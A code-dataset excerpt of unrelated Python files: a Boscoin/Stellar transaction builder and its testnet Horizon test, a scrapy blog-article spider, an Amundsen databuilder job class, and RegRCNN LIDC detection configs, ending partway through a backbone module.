'signer_weight': signer_weight
}
op = SetOptions(opts)
return self.append_op(op)
def append_hashx_signer(self, hashx, signer_weight, source=None):
return self.append_set_options_op(signer_address=hashx, signer_type='hashX', signer_weight=signer_weight,
source=source)
def append_pre_auth_tx_signer(self, pre_auth_tx, signer_weight, source=None):
return self.append_set_options_op(signer_address=pre_auth_tx, signer_type='preAuthTx',
signer_weight=signer_weight, source=source)
def append_manage_offer_op(self, selling_code, selling_issuer,
buying_code, buying_issuer,
amount, price, offer_id=0, source=None):
selling = Asset(selling_code, selling_issuer)
buying = Asset(buying_code, buying_issuer)
opts = {
'source': source,
'selling': selling,
'buying': buying,
'amount': str(amount),
'price': price,
'offer_id': offer_id,
}
op = ManageOffer(opts)
return self.append_op(op)
def append_create_passive_offer_op(self, selling_code, selling_issuer,
buying_code, buying_issuer,
amount, price, source=None):
selling = Asset(selling_code, selling_issuer)
buying = Asset(buying_code, buying_issuer)
opts = {
'source': source,
'selling': selling,
'buying': buying,
'amount': str(amount),
'price': price,
}
op = CreatePassiveOffer(opts)
return self.append_op(op)
def append_account_merge_op(self, destination, source=None):
opts = {
'source': source,
'destination': destination
}
op = AccountMerge(opts)
return self.append_op(op)
def append_inflation_op(self, source=None):
opts = {'source': source}
op = Inflation(opts)
return self.append_op(op)
def append_manage_data_op(self, data_name, data_value, source=None):
opts = {
'source': source,
'data_name': data_name,
'data_value': data_value
}
op = ManageData(opts)
return self.append_op(op)
def add_memo(self, memo):
self.memo = memo
return self
def add_text_memo(self, memo_text):
memo_text = TextMemo(memo_text)
return self.add_memo(memo_text)
def add_id_memo(self, memo_id):
memo_id = IdMemo(memo_id)
return self.add_memo(memo_id)
def add_hash_memo(self, memo_hash):
memo_hash = HashMemo(memo_hash)
return self.add_memo(memo_hash)
def add_ret_hash_memo(self, memo_return):
memo_return = RetHashMemo(memo_return)
return self.add_memo(memo_return)
def add_time_bounds(self, time_bounds):
return self.time_bounds.append(time_bounds)
def federation_payment(self, fed_address, amount, asset_type='BOS',
asset_issuer=None, source=None):
fed_info = federation(fed_address, 'name')
if not fed_info:
raise FederationError('can not get valid federation response. ')
self.append_payment_op(fed_info['account_id'], amount, asset_type,
asset_issuer, source)
memo_type = fed_info.get('memo_type')
if memo_type is not None and memo_type in ('text', 'id', 'hash'):
getattr(self, 'add_' + memo_type + '_memo')(fed_info['memo'])
def gen_tx(self):
if not self.address:
raise Exception('Transaction does not have any source address ')
if not self.sequence:
raise Exception('no sequence available, maybe the account is not funded?')
tx = Transaction(
self.address,
opts={
'sequence': self.sequence,
'timeBounds': self.time_bounds,
'memo': self.memo,
'fee': self.fee if self.fee else 10000 * len(self.ops),
'operations': self.ops,
},
)
self.tx = tx
return tx
def gen_te(self):
if self.tx is None:
self.gen_tx()
te = Te(self.tx, opts={'network_id': self.network})
if self.te:
te.signatures = self.te.signatures
self.te = te
return te
def gen_xdr(self):
if self.tx is None:
self.gen_te()
return self.te.xdr()
def gen_compliance_xdr(self):
sequence = self.sequence
self.sequence = '-1' # the sequence number should be '0' here, so the value passed in is '-1'
tx_xdr = self.gen_tx().xdr()
self.sequence = sequence
return tx_xdr
def import_from_xdr(self, xdr):
te = Te.from_xdr(xdr)
te.network_id = Network(NETWORKS[self.network]).network_id()
self.te = te
self.tx = te.tx # the imported tx may use a different source account than this builder
self.ops = te.tx.operations
self.address = te.tx.source
self.sequence = te.tx.sequence - 1
self.time_bounds = te.tx.time_bounds
self.memo = te.tx.memo
def sign(self, secret=None):
key_pair = self.key_pair if not secret else Keypair.from_seed(secret)
self.gen_te()
try:
self.te.sign(key_pair)
except SignatureExistError:
raise
def sign_preimage(self, preimage):
''' preimage must be a unicode string
'''
if self.te is None:
self.gen_te()
try:
self.te.sign_hashX(preimage)
except SignatureExistError:
raise
def submit(self):
try:
return self.horizon.submit(self.gen_xdr())
except Exception as e:
raise e
# raise Exception('network problem')
def next_builder(self):
sequence = str(int(self.sequence) + 1)
next_builder = Builder(horizon=self.horizon.horizon, network=self.network, sequence=sequence)
next_builder.address = self.address
next_builder.key_pair = self.key_pair
return next_builder
def get_sequence(self):
if not self.address:
raise Exception('no address provided')
try:
address = self.horizon.account(self.address)
except:
raise Exception('network problem')
return address.get('sequence')
```
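A brief, hedged usage sketch of the `Builder` above. The constructor arguments (`secret`, `network`) are assumed from the upstream stellar-base API this package is derived from and are not shown in this excerpt; the seed and destination address are placeholders.
```python
from boscoin_base.builder import Builder

builder = Builder(secret='SB...PLACEHOLDER_SEED', network='TESTNET')  # any non-'STELLAR' value falls back to the test horizon
builder.append_payment_op(destination='GD...PLACEHOLDER_DEST', amount='10.5', asset_type='BOS')
builder.add_text_memo('example payment')   # sets self.memo via add_memo()
builder.sign()                             # builds tx/te and signs with the seed above
response = builder.submit()                # posts the XDR to horizon
```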
#### File: py-boscoin-base/tests/test_horizon.py
```python
import requests
import json
from boscoin_base.keypair import Keypair
from boscoin_base.memo import *
from boscoin_base.operation import *
from boscoin_base.builder import HORIZON_TEST
from boscoin_base.horizon import Horizon
horizon = Horizon()
class TestMethods:
def __init__(self):
kp = Keypair.random()
self.fee = 100
self.address = kp.address().decode('ascii')
self.seed = kp.seed().decode('ascii') or None
fund(self.address)
def make_envelope(self, *args, **kwargs):
from boscoin_base.transaction import Transaction
from boscoin_base.keypair import Keypair
from boscoin_base.transaction_envelope import TransactionEnvelope as Te
opts = {
'sequence': horizon.account(self.address)['sequence'],
'fee': self.fee * len(args)
}
for opt, value in kwargs.items():
opts[opt] = value
tx = Transaction(source=self.address, opts=opts)
for count, op in enumerate(args):
tx.add_operation(operation=op)
envelope = Te(tx=tx, opts={"network_id": "TESTNET"})
signer = Keypair.from_seed(seed=self.seed)
envelope.sign(keypair=signer)
envelope_xdr = envelope.xdr()
print(envelope_xdr)
return envelope_xdr
def test_submit(self):
envelope_xdr = self.make_envelope(Payment({
'destination': self.address,
'asset': Asset.native(),
'amount': "0.0001618"
}))
response = horizon.submit(envelope_xdr)
assert 'hash' in response
def fund(address):
for attempt in range(3):
r = requests.get('https://friendbot.stellar.org/?addr=' +
address) # Get 10000 lumens
t = r.text
try:
assert 'hash' in json.loads(
t) or 'op_already_exists' in json.loads(t)
return True
except AssertionError:
pass
raise Exception("fund failed")
``` |
{
"source": "Jinhx128/scrapy_demo",
"score": 3
} |
#### File: scrapy_demo/spiders/aosun_spider.py
```python
import scrapy
from scrapy_demo.items import AosunItem
class AosunSpider(scrapy.Spider):
name = 'aosun_spider' # the spider's name, used to distinguish spiders; it must be unique, and different spiders must not share the same name
allowed_domains = ['aosun.cloud'] # domains the spider is allowed to crawl; requests to domains outside this list are dropped
custom_settings = {
'ITEM_PIPELINES': {'scrapy_demo.pipelines.AosunPipeline': 303},
}
form_data = {
'page': '1',
'rows': '4',
'isPrivate': 'false'
}
total = int(form_data['page']) * int(form_data['rows'])
base_url = 'http://aosun.cloud/api/article/getArticleList'
start_urls = [base_url] # entry urls crawled when the spider starts; subsequent urls are extracted from the data fetched from these initial urls
# headers = {
# 'Host': 'aosun.cloud',
# 'Origin': 'http://aosun.cloud',
# 'Referer': 'http://aosun.cloud/',
# 'User-Agent:': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
# 'Content-Type': 'application/x-www-form-urlencoded',
# 'Content-Length': '1149',
# 'Connection': 'keep-alive',
# 'Accept': 'application/json, text/plain, */*',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9'
# }
def start_requests(self):
# send the POST request
for url in self.start_urls:
yield scrapy.FormRequest(url=url, method='POST', formdata=self.form_data, callback=self.parse)
def parse(self, response): # callback: the response generated after each initial url finishes downloading is passed to parse() as its only argument; it parses the data, extracts items, and yields further requests to process
total = response.json()['total']
articles = response.json()['info']
for article in articles:
item = AosunItem()
item['id'] = article['id']
item['title'] = article['title']
item['modifyrq'] = article['modifyrq']
item['publish_time'] = article['publishTime']
item['info'] = article['info']
item['views'] = article['views']
item['type_id'] = article['typeId']
item['is_private'] = article['isPrivate']
item['state'] = article['state']
item['info_text'] = article['infoText']
item['menu_info'] = article['menuInfo']
item['type'] = article['type']
yield item
if int(self.form_data['page']) * int(self.form_data['rows']) < total:
self.form_data['page'] = str(int(self.form_data['page']) + 1)
yield scrapy.FormRequest(url=self.start_urls[0], method='POST', formdata=self.form_data, callback=self.parse)
``` |
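A minimal, hedged sketch of running the spider above programmatically (equivalent to `scrapy crawl aosun_spider`); it assumes the project settings are resolvable via `scrapy.cfg` / `SCRAPY_SETTINGS_MODULE`.
```python
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from scrapy_demo.spiders.aosun_spider import AosunSpider

process = CrawlerProcess(get_project_settings())
process.crawl(AosunSpider)   # start_requests() issues the first paginated POST
process.start()              # blocks until all pages have been fetched and parsed
```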
{
"source": "jinhyukchang/amundsendatabuilder",
"score": 2
} |
#### File: databuilder/job/job.py
```python
import logging
from pyhocon import ConfigTree # noqa: F401
from statsd import StatsClient
from databuilder import Scoped
from databuilder.job.base_job import Job
from databuilder.publisher.base_publisher import NoopPublisher
from databuilder.publisher.base_publisher import Publisher # noqa: F401
from databuilder.task.base_task import Task # noqa: F401
LOGGER = logging.getLogger(__name__)
class DefaultJob(Job):
# Config keys
IS_STATSD_ENABLED = 'is_statsd_enabled'
JOB_IDENTIFIER = 'identifier'
"""
Default job that expects a task, and optional publisher
If configured, the job will emit a success/fail metric counter through statsd, where the prefix will be
amundsen.databuilder.job.[identifier].
Note that job.identifier is part of the metrics prefix, so choose a unique & readable identifier for the job.
To configure statsd itself, use environment variables: https://statsd.readthedocs.io/en/v3.2.1/configure.html
"""
def __init__(self,
conf,
task,
publisher=NoopPublisher()):
# type: (ConfigTree, Task, Publisher) -> None
self.task = task
self.conf = conf
self.publisher = publisher
self.scoped_conf = Scoped.get_scoped_conf(self.conf,
self.get_scope())
if self.scoped_conf.get_bool(DefaultJob.IS_STATSD_ENABLED, False):
prefix = 'amundsen.databuilder.job.{}'.format(self.scoped_conf.get_string(DefaultJob.JOB_IDENTIFIER))
LOGGER.info('Setting statsd for job metrics with prefix: {}'.format(prefix))
self.statsd = StatsClient(prefix=prefix)
else:
self.statsd = None
def init(self, conf):
# type: (ConfigTree) -> None
pass
def _init(self):
# type: () -> None
task_conf = Scoped.get_scoped_conf(self.conf, self.task.get_scope())
self.task.init(task_conf.with_fallback(self.conf))
def launch(self):
# type: () -> None
"""
Launch a job by initializing job, run task and publish
:return:
"""
logging.info('Launching a job')
# Using nested try/finally to make sure the task gets closed as soon as possible, as well as to guarantee all the
# closeables get closed.
try:
is_success = True
self._init()
try:
self.task.run()
finally:
self.task.close()
self.publisher.init(Scoped.get_scoped_conf(self.conf, self.publisher.get_scope()))
Job.closer.register(self.publisher.close)
self.publisher.publish()
except Exception as e:
is_success = False
raise e
finally:
# TODO: If more metrics are needed on different construct, such as task, consider abstracting this out
if self.statsd:
if is_success:
LOGGER.info('Publishing job metrics for success')
self.statsd.incr('success')
else:
LOGGER.info('Publishing job metrics for failure')
self.statsd.incr('fail')
Job.closer.close()
logging.info('Job completed')
``` |
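A hedged configuration sketch for the statsd options documented above. The `job.` scope prefix is assumed from `Scoped.get_scoped_conf(conf, self.get_scope())`; task construction is omitted since it is not part of this file.
```python
from pyhocon import ConfigFactory

# keys mirror DefaultJob.JOB_IDENTIFIER and DefaultJob.IS_STATSD_ENABLED
job_config = ConfigFactory.from_dict({
    'job.identifier': 'nightly_table_metadata',  # becomes amundsen.databuilder.job.nightly_table_metadata
    'job.is_statsd_enabled': True,
})
# DefaultJob(conf=job_config, task=task).launch()  # task wiring depends on the rest of the pipeline
```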
{
"source": "jinhyun95/RegRCNN",
"score": 2
} |
#### File: datasets/lidc/configs.py
```python
import sys
import os
from collections import namedtuple
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
import numpy as np
sys.path.append(os.path.dirname(os.path.realpath(__file__))+"/../..")
from default_configs import DefaultConfigs
# legends: nested classes are not handled well by multiprocessing, hence the Label class is defined at module (outer) scope
Label = namedtuple("Label", ['id', 'name', 'color', 'm_scores']) # m_scores = malignancy scores
binLabel = namedtuple("binLabel", ['id', 'name', 'color', 'm_scores', 'bin_vals'])
class Configs(DefaultConfigs):
def __init__(self, server_env=None):
super(Configs, self).__init__(server_env)
#########################
# Preprocessing #
#########################
self.root_dir = '/data/public/rw/LIDC_IDRI/'
self.raw_data_dir = '{}/new_nrrds'.format(self.root_dir)
self.pp_dir = '{}/new_pp_norm'.format(self.root_dir)
# 'merged' for one gt per image, 'single_annotator' for four gts per image.
self.gts_to_produce = ["merged"]
self.target_spacing = (0.7, 0.7, 1.25)
#########################
# I/O #
#########################
# path to preprocessed data.
self.pp_name = 'lidc_reg'
self.input_df_name = 'info_df.pickle'
self.data_sourcedir = '/data/public/rw/{}/'.format(self.pp_name)
# settings for deployment on cluster.
if server_env:
# path to preprocessed data.
self.data_sourcedir = '/data/public/rw/{}/'.format(self.pp_name)
# one out of ['mrcnn', 'retina_net', 'retina_unet', 'detection_fpn', 'ours'].
self.model = 'ours'
self.model_path = 'models/{}.py'.format(self.model if not 'retina' in self.model else 'retina_net')
self.model_path = os.path.join(self.source_dir, self.model_path)
#########################
# Architecture #
#########################
# dimension the model operates in. one out of [2, 3].
self.dim = 2
# 'class': standard object classification per roi, pairwise combinable with each of below tasks.
# if 'class' is omitted from tasks, object classes will be fg/bg (1/0) from RPN.
# 'regression': regress some vector per each roi
# 'regression_ken_gal': use kendall-gal uncertainty sigma
# 'regression_bin': classify each roi into a bin related to a regression scale
self.prediction_tasks = ['class']
self.start_filts = 48 if self.dim == 2 else 18
self.end_filts = self.start_filts * 4 if self.dim == 2 else self.start_filts * 2
self.res_architecture = 'resnet50' # 'resnet101' , 'resnet50'
self.norm = 'batch_norm' # one of None, 'instance_norm', 'batch_norm'
# one of 'xavier_uniform', 'xavier_normal', or 'kaiming_normal', None (=default = 'kaiming_uniform')
self.weight_init = None
self.regression_n_features = 1
#########################
# Data Loader #
#########################
# distorted gt experiments: train on single-annotator gts in a random fashion to investigate network's
# handling of noisy gts.
# choose 'merged' for single, merged gt per image, or 'single_annotator' for four gts per image.
# validation is always performed on same gt kind as training, testing always on merged gt.
self.training_gts = "merged"
# select modalities from preprocessed data
self.channels = [0]
self.n_channels = len(self.channels)
# patch_size to be used for training. pre_crop_size is the patch_size before data augmentation.
self.pre_crop_size_2D = [320, 320]
self.patch_size_2D = [320, 320]
self.pre_crop_size_3D = [160, 160, 96]
self.patch_size_3D = [160, 160, 96]
self.patch_size = self.patch_size_2D if self.dim == 2 else self.patch_size_3D
self.pre_crop_size = self.pre_crop_size_2D if self.dim == 2 else self.pre_crop_size_3D
# ratio of free sampled batch elements before class balancing is triggered
# (>0 to include "empty"/background patches.)
self.batch_random_ratio = 0.3
self.balance_target = "class_targets" if 'class' in self.prediction_tasks else 'rg_bin_targets'
# set 2D network to match 3D gt boxes.
self.merge_2D_to_3D_preds = self.dim==2
self.observables_rois = []
#self.rg_map = {1:1, 2:2, 3:3, 4:4, 5:5}
#########################
# Colors and Legends #
#########################
self.plot_frequency = 5
binary_cl_labels = [Label(1, 'benign', (*self.dark_green, 1.), (1, 2)),
Label(2, 'malignant', (*self.red, 1.), (3, 4, 5))]
quintuple_cl_labels = [Label(1, 'MS1', (*self.dark_green, 1.), (1,)),
Label(2, 'MS2', (*self.dark_yellow, 1.), (2,)),
Label(3, 'MS3', (*self.orange, 1.), (3,)),
Label(4, 'MS4', (*self.bright_red, 1.), (4,)),
Label(5, 'MS5', (*self.red, 1.), (5,))]
# choose here if to do 2-way or 5-way regression-bin classification
task_spec_cl_labels = quintuple_cl_labels
self.class_labels = [
# #id #name #color #malignancy score
Label( 0, 'bg', (*self.gray, 0.), (0,))]
if "class" in self.prediction_tasks:
self.class_labels += task_spec_cl_labels
else:
self.class_labels += [Label(1, 'lesion', (*self.orange, 1.), (1,2,3,4,5))]
if any(['regression' in task for task in self.prediction_tasks]):
self.bin_labels = [binLabel(0, 'MS0', (*self.gray, 1.), (0,), (0,))]
self.bin_labels += [binLabel(cll.id, cll.name, cll.color, cll.m_scores,
tuple([ms for ms in cll.m_scores])) for cll in task_spec_cl_labels]
self.bin_id2label = {label.id: label for label in self.bin_labels}
self.ms2bin_label = {ms: label for label in self.bin_labels for ms in label.m_scores}
bins = [(min(label.bin_vals), max(label.bin_vals)) for label in self.bin_labels]
self.bin_id2rg_val = {ix: [np.mean(bin)] for ix, bin in enumerate(bins)}
self.bin_edges = [(bins[i][1] + bins[i + 1][0]) / 2 for i in range(len(bins) - 1)]
if self.class_specific_seg:
self.seg_labels = self.class_labels
else:
self.seg_labels = [ # id #name #color
Label(0, 'bg', (*self.gray, 0.)),
Label(1, 'fg', (*self.orange, 1.))
]
self.class_id2label = {label.id: label for label in self.class_labels}
self.class_dict = {label.id: label.name for label in self.class_labels if label.id != 0}
# class_dict is used in evaluator / ap, auc, etc. statistics, and class 0 (bg) only needs to be
# evaluated in debugging
self.class_cmap = {label.id: label.color for label in self.class_labels}
self.seg_id2label = {label.id: label for label in self.seg_labels}
self.cmap = {label.id: label.color for label in self.seg_labels}
self.plot_prediction_histograms = True
self.plot_stat_curves = False
self.has_colorchannels = False
self.plot_class_ids = True
self.num_classes = len(self.class_dict) # for instance classification (excl background)
self.num_seg_classes = len(self.seg_labels) # incl background
#########################
# Data Augmentation #
#########################
self.da_kwargs={
'mirror': True,
'mirror_axes': tuple(np.arange(0, self.dim, 1)),
'do_elastic_deform': True,
'alpha':(0., 1500.),
'sigma':(30., 50.),
'do_rotation':True,
'angle_x': (0., 2 * np.pi),
'angle_y': (0., 0),
'angle_z': (0., 0),
'do_scale': True,
'scale':(0.8, 1.1),
'random_crop':False,
'rand_crop_dist': (self.patch_size[0] / 2. - 3, self.patch_size[1] / 2. - 3),
'border_mode_data': 'constant',
'border_cval_data': 0,
'order_data': 1}
if self.dim == 3:
self.da_kwargs['do_elastic_deform'] = False
self.da_kwargs['angle_x'] = (0, 0.0)
self.da_kwargs['angle_y'] = (0, 0.0) #must be 0!!
self.da_kwargs['angle_z'] = (0., 2 * np.pi)
#################################
# Schedule / Selection / Optim #
#################################
self.num_epochs = 130 if self.dim == 2 else 150
self.num_train_batches = 200 if self.dim == 2 else 200
self.batch_size = 20 if self.dim == 2 else 8
# decide whether to validate on entire patient volumes (like testing) or sampled patches (like training)
# the former is more accurate, while the latter is faster (depending on volume size)
self.val_mode = 'val_sampling' # only 'val_sampling', 'val_patient' not implemented
if self.val_mode == 'val_patient':
raise NotImplementedError
if self.val_mode == 'val_sampling':
self.num_val_batches = 70
self.save_n_models = 4
# set a minimum epoch number for saving in case of instabilities in the first phase of training.
self.min_save_thresh = 0 if self.dim == 2 else 0
# criteria to average over for saving epochs, 'criterion':weight.
if "class" in self.prediction_tasks:
# 'criterion': weight
if len(self.class_labels)==3:
self.model_selection_criteria = {"benign_ap": 0.5, "malignant_ap": 0.5}
elif len(self.class_labels)==6:
self.model_selection_criteria = {str(label.name)+"_ap": 1./5 for label in self.class_labels if label.id!=0}
elif any("regression" in task for task in self.prediction_tasks):
self.model_selection_criteria = {"lesion_ap": 0.2, "lesion_avp": 0.8}
self.weight_decay = 0
self.clip_norm = 200 if 'regression_ken_gal' in self.prediction_tasks else None # number or None
# int in [0, dataset_size]. select n patients from dataset for prototyping. If None, all data is used.
self.select_prototype_subset = None #self.batch_size
#########################
# Testing #
#########################
# set the top-n-epochs to be saved for temporal averaging in testing.
self.test_n_epochs = self.save_n_models
self.test_aug_axes = (0,1,(0,1)) # None or list: choices are 0,1,(0,1) (0==spatial y, 1== spatial x).
self.held_out_test_set = False
self.max_test_patients = "all" # "all" or number
self.report_score_level = ['rois', 'patient'] # choose list from 'patient', 'rois'
self.patient_class_of_interest = 2 if 'class' in self.prediction_tasks else 1
self.metrics = ['ap', 'auc']
if any(['regression' in task for task in self.prediction_tasks]):
self.metrics += ['avp', 'rg_MAE_weighted', 'rg_MAE_weighted_tp',
'rg_bin_accuracy_weighted', 'rg_bin_accuracy_weighted_tp']
if 'aleatoric' in self.model:
self.metrics += ['rg_uncertainty', 'rg_uncertainty_tp', 'rg_uncertainty_tp_weighted']
self.evaluate_fold_means = True
self.ap_match_ious = [0.1] # list of ious to be evaluated for ap-scoring.
self.min_det_thresh = 0.1 # minimum confidence value to select predictions for evaluation.
# aggregation method for test and val_patient predictions.
# wbc = weighted box clustering as in https://arxiv.org/pdf/1811.08661.pdf,
# nms = standard non-maximum suppression, or None = no clustering
self.clustering = 'wbc'
# iou thresh (exclusive!) for regarding two preds as concerning the same ROI
self.clustering_iou = 0.1 # has to be larger than desired possible overlap iou of model predictions
self.plot_prediction_histograms = True
self.plot_stat_curves = False
self.n_test_plots = 1
#########################
# Assertions #
#########################
if not 'class' in self.prediction_tasks:
assert self.num_classes == 1
#########################
# Add model specifics #
#########################
{'detection_fpn': self.add_det_fpn_configs,
'mrcnn': self.add_mrcnn_configs, 'mrcnn_aleatoric': self.add_mrcnn_configs,
'retina_net': self.add_mrcnn_configs,
'retina_unet': self.add_mrcnn_configs,
'ours': self.add_mrcnn_configs,  # 'ours' (the default model above) reuses the mrcnn configs plus its dedicated branch below
}[self.model]()
def rg_val_to_bin_id(self, rg_val):
return float(np.digitize(np.mean(rg_val), self.bin_edges))
def add_det_fpn_configs(self):
self.learning_rate = [1e-4] * self.num_epochs
self.dynamic_lr_scheduling = False
# RoI score assigned to aggregation from pixel prediction (connected component). One of ['max', 'median'].
self.score_det = 'max'
# max number of roi candidates to identify per batch element and class.
self.n_roi_candidates = 10 if self.dim == 2 else 30
# loss mode: either weighted cross entropy ('wce'), batch-wise dice loss ('dice'), or the sum of both ('dice_wce')
self.seg_loss_mode = 'wce'
# if <1, false positive predictions in foreground are penalized less.
self.fp_dice_weight = 1 if self.dim == 2 else 1
if len(self.class_labels)==3:
self.wce_weights = [1., 1., 1.] if self.seg_loss_mode=="dice_wce" else [0.1, 1., 1.]
elif len(self.class_labels)==6:
self.wce_weights = [1., 1., 1., 1., 1., 1.] if self.seg_loss_mode == "dice_wce" else [0.1, 1., 1., 1., 1., 1.]
else:
raise Exception("mismatch loss weights & nr of classes")
self.detection_min_confidence = self.min_det_thresh
self.head_classes = self.num_seg_classes
def add_mrcnn_configs(self):
# learning rate is a list with one entry per epoch.
self.learning_rate = [1e-4] * self.num_epochs
self.dynamic_lr_scheduling = False
# disable the re-sampling of mask proposals to original size for speed-up.
# since evaluation is detection-driven (box-matching) and not instance segmentation-driven (iou-matching),
# mask-outputs are optional.
self.return_masks_in_train = False
self.return_masks_in_val = True
self.return_masks_in_test = False
# set number of proposal boxes to plot after each epoch.
self.n_plot_rpn_props = 5 if self.dim == 2 else 30
# number of classes for network heads: n_foreground_classes + 1 (background)
self.head_classes = self.num_classes + 1
self.frcnn_mode = False
# feature map strides per pyramid level are inferred from architecture.
self.backbone_strides = {'xy': [4, 8, 16, 32], 'z': [1, 2, 4, 8]}
# anchor scales are chosen according to expected object sizes in data set. Default uses only one anchor scale
# per pyramid level. (outer list are pyramid levels (corresponding to BACKBONE_STRIDES), inner list are scales per level.)
self.rpn_anchor_scales = {'xy': [[8], [16], [32], [64]], 'z': [[2], [4], [8], [16]]}
# choose which pyramid levels to extract features from: P2: 0, P3: 1, P4: 2, P5: 3.
self.pyramid_levels = [0, 1, 2, 3]
# number of feature maps in rpn. typically lowered in 3D to save gpu-memory.
self.n_rpn_features = 512 if self.dim == 2 else 128
# anchor ratios and strides per position in feature maps.
self.rpn_anchor_ratios = [0.5, 1, 2]
self.rpn_anchor_stride = 1
# Threshold for first stage (RPN) non-maximum suppression (NMS): LOWER == HARDER SELECTION
self.rpn_nms_threshold = 0.7 if self.dim == 2 else 0.7
# loss sampling settings.
self.rpn_train_anchors_per_image = 6 #per batch element
self.train_rois_per_image = 6 #per batch element
self.roi_positive_ratio = 0.5
self.anchor_matching_iou = 0.7
# factor of top-k candidates to draw from per negative sample (stochastic-hard-example-mining).
# poolsize to draw top-k candidates from will be shem_poolsize * n_negative_samples.
self.shem_poolsize = 10
self.pool_size = (7, 7) if self.dim == 2 else (7, 7, 3)
self.mask_pool_size = (14, 14) if self.dim == 2 else (14, 14, 5)
self.mask_shape = (28, 28) if self.dim == 2 else (28, 28, 10)
self.rpn_bbox_std_dev = np.array([0.1, 0.1, 0.1, 0.2, 0.2, 0.2])
self.bbox_std_dev = np.array([0.1, 0.1, 0.1, 0.2, 0.2, 0.2])
self.window = np.array([0, 0, self.patch_size[0], self.patch_size[1], 0, self.patch_size_3D[2]])
self.scale = np.array([self.patch_size[0], self.patch_size[1], self.patch_size[0], self.patch_size[1],
self.patch_size_3D[2], self.patch_size_3D[2]])
if self.dim == 2:
self.rpn_bbox_std_dev = self.rpn_bbox_std_dev[:4]
self.bbox_std_dev = self.bbox_std_dev[:4]
self.window = self.window[:4]
self.scale = self.scale[:4]
# pre-selection in proposal-layer (stage 1) for NMS-speedup. applied per batch element.
self.pre_nms_limit = 3000 if self.dim == 2 else 6000
# n_proposals to be selected after NMS per batch element. too high numbers blow up memory if "detect_while_training" is True,
# since proposals of the entire batch are forwarded through the second stage as one "batch".
self.roi_chunk_size = 2500 if self.dim == 2 else 600
self.post_nms_rois_training = 500 if self.dim == 2 else 75
self.post_nms_rois_inference = 500
# Final selection of detections (refine_detections)
self.model_max_instances_per_batch_element = 10 if self.dim == 2 else 30 # per batch element and class.
self.detection_nms_threshold = 1e-5 # needs to be > 0, otherwise all predictions are one cluster.
self.model_min_confidence = 0.1
if self.dim == 2:
self.backbone_shapes = np.array(
[[int(np.ceil(self.patch_size[0] / stride)),
int(np.ceil(self.patch_size[1] / stride))]
for stride in self.backbone_strides['xy']])
else:
self.backbone_shapes = np.array(
[[int(np.ceil(self.patch_size[0] / stride)),
int(np.ceil(self.patch_size[1] / stride)),
int(np.ceil(self.patch_size[2] / stride_z))]
for stride, stride_z in zip(self.backbone_strides['xy'], self.backbone_strides['z']
)])
if self.model == 'retina_net' or self.model == 'retina_unet':
self.focal_loss = True
# implement extra anchor-scales according to retina-net publication.
self.rpn_anchor_scales['xy'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in
self.rpn_anchor_scales['xy']]
self.rpn_anchor_scales['z'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in
self.rpn_anchor_scales['z']]
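# e.g. an xy base scale of [8] becomes [8, 8*2**(1/3), 8*2**(2/3)] ≈ [8, 10.1, 12.7] (illustrative numbers)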
self.n_anchors_per_pos = len(self.rpn_anchor_ratios) * 3
self.n_rpn_features = 256 if self.dim == 2 else 128
# pre-selection of detections for NMS-speedup. per entire batch.
self.pre_nms_limit = (500 if self.dim == 2 else 6250) * self.batch_size
# anchor matching iou is lower than in Mask R-CNN according to https://arxiv.org/abs/1708.02002
self.anchor_matching_iou = 0.5
if self.model == 'retina_unet':
self.operate_stride1 = True
elif self.model == 'ours':
# implement extra anchor-scales according to retina-net publication.
self.rpn_anchor_scales['xy'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in
self.rpn_anchor_scales['xy']]
self.rpn_anchor_scales['z'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in
self.rpn_anchor_scales['z']]
self.n_anchors_per_pos = len(self.rpn_anchor_ratios) * 3
self.n_rpn_features = 256 if self.dim == 2 else 128
# pre-selection of detections for NMS-speedup. per entire batch.
self.pre_nms_limit = (500 if self.dim == 2 else 6250) * self.batch_size
# anchor matching iou is lower than in Mask R-CNN according to https://arxiv.org/abs/1708.02002
self.anchor_matching_iou = 0.5
```
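A small, self-contained sketch of how `rg_val_to_bin_id()` above maps mean regression values to malignancy-score bins. The bin edges `[0.5, 1.5, 2.5, 3.5, 4.5]` are an assumption derived from the MS0..MS5 `binLabel` definitions, not taken from a saved config.
```python
import numpy as np

bin_edges = [0.5, 1.5, 2.5, 3.5, 4.5]

def rg_val_to_bin_id(rg_val):
    return float(np.digitize(np.mean(rg_val), bin_edges))

for rg_val in (0.2, 1.0, 3.2, 4.9):
    print(rg_val, '->', rg_val_to_bin_id(rg_val))
# 0.2 -> 0.0 (MS0/bg), 1.0 -> 1.0 (MS1), 3.2 -> 3.0 (MS3), 4.9 -> 5.0 (MS5)
```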
#### File: RegRCNN/models/backbone.py
```python
import torch.nn as nn
import torch.nn.functional as F
import torch
class ConvGenerator():
"""conv-layer generator to avoid 2D vs. 3D distinction in code.
"""
def __init__(self, dim):
self.dim = dim
def __call__(self, c_in, c_out, ks, pad=0, stride=1, norm=None, relu='relu'):
"""provides generic conv-layer modules for set dimension.
:param c_in: number of in_channels.
:param c_out: number of out_channels.
:param ks: kernel size.
:param pad: pad size.
:param stride: kernel stride.
:param norm: string specifying type of feature map normalization. If None, no normalization is applied.
:param relu: string specifying type of nonlinearity. If None, no nonlinearity is applied.
:return: 2D or 3D conv-layer module.
"""
if self.dim == 2:
module = nn.Conv2d(c_in, c_out, kernel_size=ks, padding=pad, stride=stride)
if norm is not None:
if norm == 'instance_norm':
norm_layer = nn.InstanceNorm2d(c_out)
elif norm == 'batch_norm':
norm_layer = nn.BatchNorm2d(c_out)
else:
raise ValueError('norm type as specified in configs is not implemented...')
module = nn.Sequential(module, norm_layer)
elif self.dim==3:
module = nn.Conv3d(c_in, c_out, kernel_size=ks, padding=pad, stride=stride)
if norm is not None:
if norm == 'instance_norm':
norm_layer = nn.InstanceNorm3d(c_out)
elif norm == 'batch_norm':
norm_layer = nn.BatchNorm3d(c_out)
else:
